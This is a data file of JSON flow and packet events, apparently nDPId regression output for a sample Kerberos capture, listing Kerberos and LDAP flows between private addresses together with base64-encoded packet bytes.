+00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337930219,"pkt":"AAgCHEeupB9ywglqCABFAAFEE1VAAIAGfW2sEAgIrBAIycADwA2zKyf0U0aPtVAYAQCiqgAABQAMBxAAAAAcAagAAgAAANAW0BaHIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbZHvDki757uIRa6348vky4CmSXJcuY8x7Y1L3GMPoboaFC4AmaVBuECBYLv9qMZx8MRhhEX3NAubRHjTv4BhutqH0onvuRNc5YNBgbuLmx\/PeM5pC\/bambRC96DP0B9XtGxHF5b6I04IhLGs2Ss="} +00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1549337930219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337930219,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAF5AAIAGkKSsEAjJrBAICMANwANTRo+1syspEFAYAP\/w8AAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBEJ\/MyGgG2X9jllu+ZB+MxLzLgKVhkidSZOf9UFj0HoVGhQSTvPAIV6ETXdthgzo7fJnzn1QgLAxGW+unJjrxZzV2yGjHgQcBAQE\/\/\/\/\/\/8AAAAAToOoIEtcH3O\/XLUOvcMURw=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931189,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931189,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1549337931189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931189,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAHBAAIAGkHysEAjJrBAICMARAYXGiPwnAgHw6FAYAQD72QAAHIAjHF8ymtjcD1VQuy4UgRChAu\/ekRMgcpsydbeCEgGc8O49XcEm2dIOQUYWz5jyNJ04mLjuLVb5JED7bXFEp0Ouk95kXWAsbhG+yaFiTruRiQNLefpIfBd02fAN9rH6kVBTVFVzTavxG5ZN46Q2CRurERdYtT07E7VAGTF+6yWhKn18+hUxFM5IXiI8jM4osfH687+lmO1gN\/3mr3cymHmPLwvBfLQ9P\/qJ62iSz72gALgVKjnTrFQYtji5UhDqTerpDdd7cbCpV4VyQehZ\/3jzwsKcVZtQElZtM7aiTvqbzIsK7RmP3EZFJoQ\/JIQyyhY="} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931190,"pkt":"AAgCHEeupB9ywglqCABFAAD6E2FAAIAGfausEAgIrBAIyQGFwBECAfDoxoj9GVAYAQDO8AAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1TTwhyAF9FVLbWTl8wTaD0aGMw9PDC0vNUorciel2CrkeZRTWRInWV74srNnVapF3vxPYDt7dvyfJVk888MzdKOasNrV1ijuwTfVJ0DIXj985iqAQmj9Mcte2ZOXgI6pFvWB0EEgpCluxB9enG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931198,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"flow_min_l4_payload_len":113,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":113,"midstream":1,"thread_ts_msec":1549337931198,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1549337931198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1549337931198,"pkt":"pB9ywglqAAgCHEeuCABFAACZAHRAAIAGkPmsEAjJrBAICMASAFgkNdEgXsLgdFAYAQB+8gAAMUMT6Lk9nd3l4g7meOnydVZeUkzRDUCNbnZ+O2nc5UtCJOGQV8MBRj2azOMjgxpQ1tcViooap1+TILjpjhURvLMTREvy8WPkAKcvtuPHKbLtQ3Ir7HNN6Ftdy+KwiOrOLvSrSyEtUhWZxA6KOnwca9s="} +00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjkBvFbBksZRBZsgqvT9rWZWIMz104YLf86+Cksa0ZMsEGJ\/RDcCZOr8kPQRKlwzkm2uQjqkaOemu4sYhWXYr71KrOEs2JUveeWW4HHkLaYXd0a2yOtTAVV1zR76rPVw3Om2DZiy3OdOJiQuRn3tY6sCbzkX\/gKz0r0nI8miItgy4uzP0Z9rEEUiiCUR\/XkOkdTBzoAcDBQBAgQAAohAbDkhBUFBZQ1JBRlQuT1JHoycwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44sbqoEjAQAgESAgERAgEXAgEYAgL\/eQ=="} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wgpM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="} +00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rlJkc3DH"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="} +00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUk